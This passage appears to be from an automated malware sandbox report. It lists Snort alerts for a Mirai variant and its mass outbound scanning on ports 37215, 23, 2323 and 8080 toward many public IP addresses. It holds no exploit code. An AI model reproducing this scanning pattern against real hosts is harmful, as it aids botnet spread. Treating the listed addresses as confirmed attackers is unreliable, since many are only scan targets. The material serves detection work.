    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48544 -> 95.100.52.179:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53640 -> 95.216.225.145:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54862 -> 95.180.163.70:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50076 -> 95.170.154.82:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51148 -> 95.100.77.199:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53486 -> 95.98.120.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42438 -> 95.90.22.30:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38546 -> 95.42.26.205:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56132 -> 95.181.226.68:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40676 -> 95.174.99.33:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48178 -> 95.216.25.224:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43660 -> 95.85.212.248:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38286 -> 95.58.241.144:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37146 -> 88.209.239.18:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51892 -> 112.136.164.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34700 -> 112.28.200.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34702 -> 112.28.200.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39534 -> 95.179.248.194:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55836 -> 95.101.200.220:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50536 -> 95.107.62.145:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43950 -> 112.46.224.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46446 -> 88.99.226.56:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56326 -> 88.99.36.250:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46726 -> 95.213.134.46:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59674 -> 95.230.223.142:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35938 -> 112.164.61.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46532 -> 112.173.225.37:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35536 -> 112.173.143.61:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37350 -> 95.86.78.186:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41918 -> 112.133.234.127:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52814 -> 112.240.60.135:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52824 -> 112.240.60.135:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47954 -> 95.101.56.83:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50868 -> 95.131.97.138:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51628 -> 95.216.85.81:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46768 -> 95.217.165.216:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36662 -> 88.83.99.166:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33912 -> 88.134.101.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:32966 -> 95.140.226.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49810 -> 95.217.73.16:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42918 -> 95.170.64.195:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50224 -> 95.80.201.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56700 -> 95.217.45.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55594 -> 112.197.203.40:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53280 -> 88.208.223.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48278 -> 88.198.52.89:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59430 -> 88.218.158.102:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59442 -> 88.218.158.102:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59522 -> 95.216.169.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49546 -> 95.65.86.155:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40186 -> 95.101.43.78:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57832 -> 95.101.16.47:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40894 -> 95.216.68.58:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34520 -> 95.142.160.11:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38732 -> 95.210.132.129:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57704 -> 95.254.169.71:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52850 -> 95.101.47.100:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46308 -> 95.171.228.198:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60630 -> 88.80.145.71:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53240 -> 88.254.27.158:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60122 -> 95.100.14.138:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58066 -> 95.57.68.134:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59386 -> 112.196.77.145:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35164 -> 112.173.62.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41610 -> 112.221.48.234:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50456 -> 112.192.16.135:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41088 -> 88.214.196.232:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58194 -> 88.93.161.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39562 -> 95.85.19.102:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59526 -> 95.142.161.109:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48170 -> 112.175.31.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57110 -> 95.211.191.173:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37822 -> 95.101.203.45:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57402 -> 112.197.114.2:80
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33276
    Source: unknownNetwork traffic detected: HTTP traffic on port 33108 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55408 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55408
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55206
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55206
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55230
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55242
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55258
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55292
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55304
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55308
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55350
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55366
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 55382
    Source: unknownNetwork traffic detected: HTTP traffic on port 2323 -> 43202
    Source: unknownNetwork traffic detected: HTTP traffic on port 2323 -> 43200
    Source: unknownNetwork traffic detected: HTTP traffic on port 2323 -> 43202
    Source: unknownNetwork traffic detected: HTTP traffic on port 2323 -> 43200
    Source: unknownNetwork traffic detected: HTTP traffic on port 2323 -> 43202
    Source: unknownNetwork traffic detected: HTTP traffic on port 2323 -> 43200
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.103.255.119:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.241.238.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.34.180.186:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.25.222.50:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.62.98.169:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.128.191.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.215.199.179:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.38.67.205:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.175.116.212:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.254.37.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.79.5.54:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.234.93.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.9.2.223:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.96.11.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.117.99.248:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.207.217.135:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.149.49.154:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.8.20.16:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.137.40.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.37.225.242:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.215.169.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.22.202.60:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.92.144.239:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.187.202.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.28.32.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.67.177.145:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.235.165.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.193.29.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.220.109.132:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.226.143.27:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.187.206.124:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.64.0.254:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.198.1.68:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.245.240.200:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.182.187.51:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.32.111.53:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.191.134.132:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.238.118.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.209.151.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.139.215.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.1.155.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.29.2.100:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.187.180.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.201.63.20:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.116.111.67:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.167.106.235:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.110.100.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.244.136.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.50.72.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.110.6.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.144.37.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.37.124.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.247.87.16:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.79.81.212:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.55.18.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.121.219.108:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.62.131.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.139.43.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.241.217.206:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.18.60.105:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.97.234.177:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.103.34.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.214.56.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.30.162.169:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.215.196.26:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.251.226.217:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.160.3.141:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.165.86.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.132.41.207:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.141.195.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.50.46.109:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.178.81.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.242.241.72:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.123.241.162:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.136.44.49:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.177.153.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.253.229.211:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.96.150.246:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.180.151.67:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.57.47.126:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.166.21.37:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.221.20.205:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.131.39.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.171.6.144:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.246.153.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.101.44.232:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.55.65.148:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.106.96.194:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.121.25.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.60.36.244:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.157.53.87:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.118.105.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.221.192.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.145.176.76:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.41.104.162:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.249.15.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.182.146.6:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.16.164.80:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.218.89.82:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.140.29.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.241.116.128:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.161.179.102:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.228.60.43:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.211.233.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.19.110.59:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.213.162.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.72.137.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.20.115.151:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.173.129.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.134.210.173:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.163.254.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.21.169.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.137.103.122:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.9.98.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.241.135.126:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.100.207.157:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.49.74.123:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.249.199.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.218.226.94:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.33.92.108:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.65.180.29:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.61.40.199:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.165.94.87:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.50.70.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.234.213.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.125.221.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.72.153.19:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.191.220.247:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.156.160.188:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.19.59.46:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.223.121.243:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.160.141.135:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.63.43.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.189.225.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.228.222.92:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.97.36.128:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.119.203.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.49.77.203:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.217.18.192:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.130.81.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.77.220.122:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.99.74.76:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.128.39.218:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.61.208.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.249.24.56:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.234.174.245:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.55.164.110:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.65.180.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.130.205.74:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.252.94.145:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.208.138.25:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.141.252.16:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.170.248.221:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.247.241.25:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.164.47.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.217.9.78:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.50.15.144:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.19.20.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.153.127.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:14310 -> 41.67.218.206:37215
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.79.255.119:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.241.238.185:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.58.212.50:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.0.254.187:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.215.108.32:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.255.68.185:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.231.192.206:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.110.14.234:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.101.173.49:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.87.227.200:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.81.99.40:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.98.152.239:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.92.218.192:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.114.115.71:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.85.184.10:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.84.228.29:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.171.87.166:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.129.212.105:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.214.231.87:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.185.206.105:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.141.154.16:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.16.237.205:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.113.86.162:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.163.49.145:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.139.146.153:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.182.117.80:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.112.205.253:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.227.195.248:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.16.175.160:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.249.135.52:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.45.66.18:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.19.8.196:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.18.217.173:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.100.176.73:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.240.42.191:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.37.243.202:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.214.69.212:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.221.167.241:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.121.243.102:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.37.121.254:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.199.55.127:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.152.185.71:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.196.95.60:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.26.194.120:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.66.169.172:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.224.63.91:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.147.25.214:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.194.169.55:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.12.212.210:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.177.178.155:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.213.180.5:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.29.103.44:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.37.76.215:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.48.239.65:8080
